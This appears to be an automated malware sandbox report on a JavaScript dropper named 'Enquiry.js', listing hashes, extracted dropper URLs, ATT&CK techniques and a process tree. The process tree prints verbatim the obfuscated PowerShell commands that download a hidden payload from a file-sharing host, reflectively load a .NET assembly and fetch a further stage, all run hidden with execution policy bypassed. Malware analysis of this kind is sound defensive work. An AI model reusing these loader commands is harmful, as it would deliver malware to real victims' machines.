7c9332df56fc0061fc832475af43d1c94636a5f8710011b3952dc98716f20899

General

Target

Enquiry.js
Size

225KB
MD5

90480a98c3f20658dcc43fa6db7bd562
SHA1

1a379838129904188cd08ffe9c645a5daba3bea5
SHA256

7c9332df56fc0061fc832475af43d1c94636a5f8710011b3952dc98716f20899
SHA512

05f8c16e4ec8af3939a7fea5b8e4adde852ba00e5b0513aedaad7afeaf556741094fff75681bdbe070e3de62fc9f3c76939271c004a4bf308e38ea20126b611d
SSDEEP

6144:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSq+QdBA5gC/2KZgSq+Qdt:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSm

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c

exe.dropper

https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	2036	powershell.exe
6	2036	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
792	powershell.exe
2036	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
792	powershell.exe
2036	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exe

description	pid	Process	procid_target
PID 1636 wrote to memory of 792	1636	wscript.exe	31
PID 1636 wrote to memory of 792	1636	wscript.exe	31
PID 1636 wrote to memory of 792	1636	wscript.exe	31
PID 792 wrote to memory of 2036	792	powershell.exe	33
PID 792 wrote to memory of 2036	792	powershell.exe	33
PID 792 wrote to memory of 2036	792	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pedantice = 'JABkAGkAcwB0AHUAcgBiAGEAcgAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA2AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAwAFIAVQBnAGIAWgAtADgARgBiAFUAcwBMAGsAbQBUAEgASwBrADcAdgBtAGkAbwBRAFIAcABIAEcARAA4AHEAVgBNAGsAZwBmAC0AdgBfAFkAbgBhAF8AVwB1ADQAVABkAHIASgBlAHAAcwBlADcAMABKAFUAZAAtAGoAOQBVAE0AZgByAHkAJgBwAGsAXwB2AGkAZAA9AGUAMAAxADAAOQA2ADMAOABjADkAYgBmAGIAOQA1ADcAMQA3ADMAMgA3ADkANAAzADcANABhADEAZgBmADYAYwAgACcAOwAkAGcAdQBpAG4AZABhAGwAZQB0AGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbAB1AGkAcgAgAD0AIAAkAGcAdQBpAG4AZABhAGwAZQB0AGEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAZABpAHMAdAB1AHIAYgBhAHIAKQA7ACQAcABzAHkAbABsAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABsAHUAaQByACkAOwAkAGEAcABlAHQAaQBiAGkAbABpAGQAYQBkAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGEAdgBpAG4AYwB1ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAGcAbwByAGQAdQBjAGgAbwAgAD0AIAAkAHAAcwB5AGwAbABvAC4ASQBuAGQAZQB4AE8AZgAoACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQApADsAJABhAHIAYQBwAGkAbgBnAGEAIAA9ACAAJABwAHMAeQBsAGwAbwAuAEkAbgBkAGUAeABPAGYAKAAkAGEAdgBpAG4AYwB1ACkAOwAkAGcAbwByAGQAdQBjAGgAbwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AZwB0ACAAJABnAG8AcgBkAHUAYwBoAG8AOwAkAGcAbwByAGQAdQBjAGgAbwAgACsAPQAgACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQAuAEwAZQBuAGcAdABoADsAJABwAGUAcgBpAHMAcwBvAGwAbwBnAGkAYQAgAD0AIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AIAAkAGcAbwByAGQAdQBjAGgAbwA7ACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlACAAPQAgACQAcABzAHkAbABsAG8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAZwBvAHIAZAB1AGMAaABvACwAIAAkAHAAZQByAGkAcwBzAG8AbABvAGcAaQBhACkAOwAkAGMAbwByAHIAaQBkAG8AIAA9ACAALQBqAG8AaQBuACAAKAAkAG0AZQB0AGgAbwBkAGkAYwBhAG0AZQBuAHQAZQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlAC4ATABlAG4AZwB0AGgAKQBdADsAJAB0AGEAbABpAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwBvAHIAcgBpAGQAbwApADsAJABvAGkAcgBhAGQAYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB0AGEAbABpAG0AKQA7ACQAcABlAGMAaABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAcABlAGMAaABhAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnAHQAeAB0AC4AOAA4ADIALwBlAGwAaQBmAC8AcgB0AC4AbQBvAGMALgBhAHkAYQBrAGkAbAByAGUAeQBhAGgAbABhAHQALwAvADoAcwBwAHQAdABoACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACAAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAMQAnACwAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACkAKQA7AA==';$torvamento = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($pedantice));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $torvamento
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$disturbar = 'https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c ';$guindaleta = New-Object System.Net.WebClient;$luir = $guindaleta.DownloadData($disturbar);$psyllo = [System.Text.Encoding]::UTF8.GetString($luir);$apetibilidade = '<<BASE64_START>>';$avincu = '<<BASE64_END>>';$gorducho = $psyllo.IndexOf($apetibilidade);$arapinga = $psyllo.IndexOf($avincu);$gorducho -ge 0 -and $arapinga -gt $gorducho;$gorducho += $apetibilidade.Length;$perissologia = $arapinga - $gorducho;$methodicamente = $psyllo.Substring($gorducho, $perissologia);$corrido = -join ($methodicamente.ToCharArray() | ForEach-Object { $_ })[-1..-($methodicamente.Length)];$talim = [System.Convert]::FromBase64String($corrido);$oirada = [System.Reflection.Assembly]::Load($talim);$pecha = [dnlib.IO.Home].GetMethod('VAI');$pecha.Invoke($null, @('txt.882/elif/rt.moc.ayakilreyahlat//:sptth', '$enfunado', '$enfunado', '$enfunado', 'MSBuild', '$enfunado', '$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','1','$enfunado'));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ad6bce1e93ee9bd4bea9a26c77fe275

SHA1
d883ba5fc2d00c6f4265d1c120617f9492de7f88

SHA256
ea04cca7bcf78cec77bca95307ae57193cbae975d34e6023be2631295a3d0eee

SHA512
d0c42dfe8be32133ba78325f709ba7c916d8788fc4098618befb727538f8388e0209d0064ae240718eb3a215b1118ea486bbe07b16ac43f7419075c8917c8263

Download Submit
memory/792-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/792-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/792-6-0x0000000002760000-0x0000000002768000-memory.dmp

Filesize
32KB

Download
memory/792-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/792-13-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/792-14-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads